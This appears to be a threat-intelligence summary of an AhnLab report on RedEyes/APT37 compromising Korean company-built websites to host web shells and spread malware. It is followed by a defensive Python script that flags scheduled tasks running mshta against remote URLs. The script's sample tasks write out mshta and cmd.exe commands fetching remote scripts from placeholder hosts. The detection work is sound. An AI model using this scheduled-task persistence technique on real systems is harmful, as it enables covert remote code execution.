Confirmed damage to multiple domestic websites produced by a specific website production company
2023-06-09 • AhnLab
AhnLab observed RedEyes/APT37-linked activity compromising multiple South Korean websites built by the same web production company and using them to distribute malware or host web shells. The affected sites spanned sectors including manufacturing, trade, electronics, education, construction, healthcare, and travel, and shared externally accessible admin paths that likely enabled malicious file uploads. Infections were initially distributed through email attachments and maintained through scheduled tasks that invoked mshta to connect to web-shell URLs on legitimate compromised sites, making victim awareness and attribution more difficult.
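
A defender-side check for the persistence pattern described above, added here as an illustration and not taken from AhnLab's report: it reads Task Scheduler XML definitions (the format `schtasks /query /xml` emits) and reports any task whose action runs mshta against an HTTP(S) URL, directly or through a wrapper. The sample tasks, hostnames and helper names are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML (as produced by `schtasks /query /xml`).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
MSHTA_RE = re.compile(r"(?<![\w.])mshta(?:\.exe)?(?![\w.])", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def find_mshta_urls(task_xml):
    """Return the URLs passed to mshta by any Exec action in one task definition."""
    root = ET.fromstring(task_xml)
    urls = []
    for action in root.findall("./t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", "", NS) or ""
        arguments = action.findtext("t:Arguments", "", NS) or ""
        # Join both fields so mshta is caught whether it is the command itself
        # or is launched through a wrapper such as cmd.exe.
        cmdline = f"{command} {arguments}"
        if MSHTA_RE.search(cmdline):
            urls.extend(URL_RE.findall(cmdline))
    return urls


def _task(command, arguments):
    """Build a minimal task definition (constructed sample, not real data)."""
    return (f'<Task version="1.2" xmlns="{NS["t"]}"><Actions><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


# Constructed samples; hostnames use the reserved .example TLD.
SAMPLES = {
    "direct": _task("mshta.exe", "https://legit-site.example/placeholder"),
    "wrapped": _task(r"C:\Windows\System32\cmd.exe",
                     "/c start mshta http://legit-site.example/placeholder"),
    "local-hta": _task("mshta.exe", r"C:\Tools\report.hta"),
    "updater": _task(r"C:\Program Files\Updater\update.exe",
                     "--check https://updates.example/feed"),
}


def scan(tasks):
    """Map task name -> URLs for every task that runs mshta against a URL."""
    hits = {name: find_mshta_urls(xml) for name, xml in tasks.items()}
    return {name: urls for name, urls in hits.items() if urls}


if __name__ == "__main__":
    for name, urls in scan(SAMPLES).items():
        print(f"{name}: mshta -> {', '.join(urls)}")
```

Because the URLs point at legitimate compromised sites, the mshta-plus-URL pattern is the signal here, not the reputation of the destination domain.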